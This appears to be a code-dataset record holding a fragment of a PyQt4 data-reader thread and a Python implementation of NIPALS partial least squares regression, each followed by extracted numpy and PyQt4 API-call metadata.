angle = round(float(self.rowBuffer[0][self.anglecolnum]))
zval = round(float(self.rowBuffer[0][self.zcolnum]), 1)
self.processData(zval, angle, radius1)
self.processData(zval, angle, radius2)
self.rowBuffer = []
if self.reader:
self.reader.end()
self.reader = None
""" kills both the reader and data processor threads;
called when application exits """
def end(self):
if self.reader:
self.reader.end()
self.running = False
|
[
"date_helpers.dateObjFloat",
"numpy.sin",
"numpy.array",
"datareader.DataReader",
"numpy.cos",
"numpy.round",
"PyQt4.QtCore.pyqtSignal"
] |
[((538, 561), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['list'], {}), '(list)\n', (555, 561), False, 'from PyQt4 import QtCore\n'), ((631, 655), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['tuple'], {}), '(tuple)\n', (648, 655), False, 'from PyQt4 import QtCore\n'), ((671, 693), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['int'], {}), '(int)\n', (688, 693), False, 'from PyQt4 import QtCore\n'), ((944, 998), 'datareader.DataReader', 'datareader.DataReader', ([], {'parent': 'self', 'filename': 'self.file'}), '(parent=self, filename=self.file)\n', (965, 998), False, 'import datareader\n'), ((5046, 5076), 'numpy.round', 'np.round', (['zcol'], {'decimals': 'zndec'}), '(zcol, decimals=zndec)\n', (5054, 5076), True, 'import numpy as np\n'), ((5349, 5379), 'numpy.round', 'np.round', (['tcol'], {'decimals': 'tndec'}), '(tcol, decimals=tndec)\n', (5357, 5379), True, 'import numpy as np\n'), ((5699, 5723), 'numpy.array', 'np.array', (['self.rowBuffer'], {}), '(self.rowBuffer)\n', (5707, 5723), True, 'import numpy as np\n'), ((7523, 7575), 'datareader.DataReader', 'datareader.DataReader', ([], {'parent': 'self', 'filename': 'newfile'}), '(parent=self, filename=newfile)\n', (7544, 7575), False, 'import datareader\n'), ((6526, 6559), 'date_helpers.dateObjFloat', 'date_helpers.dateObjFloat', (['endStr'], {}), '(endStr)\n', (6551, 6559), False, 'import date_helpers\n'), ((6562, 6597), 'date_helpers.dateObjFloat', 'date_helpers.dateObjFloat', (['startStr'], {}), '(startStr)\n', (6587, 6597), False, 'import date_helpers\n'), ((3592, 3611), 'numpy.array', 'np.array', (['dataArray'], {}), '(dataArray)\n', (3600, 3611), True, 'import numpy as np\n'), ((4242, 4271), 'numpy.cos', 'np.cos', (['(angle * np.pi / 180.0)'], {}), '(angle * np.pi / 180.0)\n', (4248, 4271), True, 'import numpy as np\n'), ((4298, 4327), 'numpy.sin', 'np.sin', (['(angle * np.pi / 180.0)'], {}), '(angle * np.pi / 180.0)\n', (4304, 4327), True, 'import numpy as np\n'), ((4477, 4514), 'numpy.cos', 'np.cos', (['(angle * np.pi / 180.0 + np.pi)'], {}), '(angle * np.pi / 180.0 + np.pi)\n', (4483, 4514), True, 'import numpy as np\n'), ((4541, 4578), 'numpy.sin', 'np.sin', (['(angle * np.pi / 180.0 + np.pi)'], {}), '(angle * np.pi / 180.0 + np.pi)\n', (4547, 4578), True, 'import numpy as np\n')]
|
from __future__ import print_function
import numpy as np
from ._PLSbase import plsbase as pls_base
from .utilities import nanmatprod, isValid
from .engines import pls as pls_engine
class pls(pls_base):
"""
This is the classic multivariate NIPALS PLS algorithm.
Parameters:
X: {N, P} array like
a table of N observations (rows) and P variables (columns) - The explanatory variables,
Y: {N, Q} array like
a table of N observations (rows) and Q variables (columns) - The dependent variables,
a: int
the number of PLS component to be fitted
scaling: float, optional
A number typically between 0.0 and 1.0 corresponding to the scaling, typical example are
0.0 corresponds to mean centring
0.5 corresponds to Pareto scaling
1.0 corresponds to unit variance scaling
cvfold: int, optional
the number of folds in the cross-validation - default is 7
Returns
-------
out : a pls2 object with a components
Attributes:
W : PLS weights table
T : PLS scores table
P : PLS loadings table
C : PLS score regression coefficients
B : PLS regression coefficients
Yhat: model predicted Y
Yhatcv: cross-validation predicted Y
R2Y: Determination coefficients of Y
Q2Ycol: Cross validation parameters per colums of Y
Q2Ycum: Cumulative cross validation parameter
Methods:
scores(n), loadings(n), weights(n)
n: int
component id
return the scores of the nth component
predict(Xnew)
Xnew: array like
new observation with the same number of variables tha X
return predicted Y
"""
def __init__(self, X, Y, ncp=1, cvfold=None, scaling=0):
pls_base.__init__(self, X, Y, ncp=ncp, scaling=scaling, cvfold=cvfold)
self.model = "pls"
missingValues = False
if self.missingValuesInX or self.missingValuesInY:
# TODO: For now nissing values in both X and Y are dealt the same way -> Improve this
missingValues = True
self.T, self.U, self.P, self.W, self.C, self.B = pls_engine(self.X, self.Y, self.ncp, missing_values=missingValues)
self.Wstar = self.W @ np.linalg.inv(self.P.T @ self.W)
self.Yhat = self.predict(self.X, preprocessing=False)
self.R2Y, self.R2Ycol = self._calculateR2Y(self.Yhat)
self.cross_validation(ncp=ncp)
self.R2X = np.sum(np.square(self.T @ self.P.T))/self.SSX
def predict(self, Xnew, preprocessing=True, statistics=False, **kwargs):
Xnew, nnew, pxnew = isValid(Xnew, forPrediction=True)
if preprocessing:
Xnew = (Xnew - self.Xbar)
Xnew /= np.power(self.Xstd, self.scaling)
assert pxnew == self.px, "New observations do not have the same number of variables!!"
if statistics:
That = Xnew @ self.W
Xpred = That @ self.P.T
Xres = Xnew - Xpred
Xnew2 = np.square(Xres)
if np.isnan(Xnew2).any():
ssrx = np.nansum(Xnew2, axis=0)
else:
ssrx = np.sum(Xnew2, axis=0)
stats = {'That':That, 'ESS':ssrx}
if self.B is not None:
# Yhat = Xnew @ self.B
if self.missingValuesInX:
Yhat = nanmatprod(Xnew, self.B)
else:
Yhat = Xnew @ self.B
if preprocessing:
Yhat = Yhat * np.power(self.Ystd, self.scaling) + self.Ybar
else:
Yhat = None
if statistics:
return Yhat, stats
else:
return Yhat
|
[
"numpy.nansum",
"numpy.sum",
"numpy.power",
"numpy.square",
"numpy.isnan",
"numpy.linalg.inv"
] |
[((2506, 2538), 'numpy.linalg.inv', 'np.linalg.inv', (['(self.P.T @ self.W)'], {}), '(self.P.T @ self.W)\n', (2519, 2538), True, 'import numpy as np\n'), ((3002, 3035), 'numpy.power', 'np.power', (['self.Xstd', 'self.scaling'], {}), '(self.Xstd, self.scaling)\n', (3010, 3035), True, 'import numpy as np\n'), ((3285, 3300), 'numpy.square', 'np.square', (['Xres'], {}), '(Xres)\n', (3294, 3300), True, 'import numpy as np\n'), ((2728, 2756), 'numpy.square', 'np.square', (['(self.T @ self.P.T)'], {}), '(self.T @ self.P.T)\n', (2737, 2756), True, 'import numpy as np\n'), ((3367, 3391), 'numpy.nansum', 'np.nansum', (['Xnew2'], {'axis': '(0)'}), '(Xnew2, axis=0)\n', (3376, 3391), True, 'import numpy as np\n'), ((3433, 3454), 'numpy.sum', 'np.sum', (['Xnew2'], {'axis': '(0)'}), '(Xnew2, axis=0)\n', (3439, 3454), True, 'import numpy as np\n'), ((3321, 3336), 'numpy.isnan', 'np.isnan', (['Xnew2'], {}), '(Xnew2)\n', (3329, 3336), True, 'import numpy as np\n'), ((3788, 3821), 'numpy.power', 'np.power', (['self.Ystd', 'self.scaling'], {}), '(self.Ystd, self.scaling)\n', (3796, 3821), True, 'import numpy as np\n')]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.